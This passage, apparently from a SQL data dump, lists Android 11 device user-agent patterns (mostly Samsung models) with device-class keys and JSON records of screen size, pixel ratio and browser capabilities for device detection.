Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A516B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A525M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A526B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A725M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-F700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-F711B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-F916B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":589,\"screenHeight\":736,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":339,\"screenHeight\":697,\"pixelRatio\":2.125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G973U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G988B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M215F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M317F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":772,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SC-03L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SC-54A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SCV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SH-02M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SH-04L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SH-RM15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SHG03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A015F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A015M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A022F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A022G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A022M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A025F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A025M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A032F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A037F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A037G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A037M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A102U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A115M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A125M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A125U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A127F) 